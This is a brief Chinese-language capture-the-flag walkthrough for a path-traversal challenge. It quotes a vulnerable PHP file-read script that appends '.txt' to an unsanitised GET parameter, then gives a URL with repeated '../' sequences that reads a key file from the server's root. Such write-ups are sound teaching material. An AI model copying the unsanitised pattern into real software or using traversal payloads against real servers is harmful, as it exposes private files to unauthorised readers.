过关地址
启动环境,进入网址后,在html源码中找到提示
<!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 ->
<?php
$p=($_GET["p"].".txt");
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>
http://219.153.49.228:43752/r.php?p=…/…/…/…/…/…/the_key_is_here
r.php是我们得到的提示,“p=”是要提交的GET参数 "…/"是返回上一级目录,因为the_key_is_here.txt这个文件在根目录上,注意不需要加 .txt这个后缀,php代码中已经给出,自动添加,输入网址即可得到key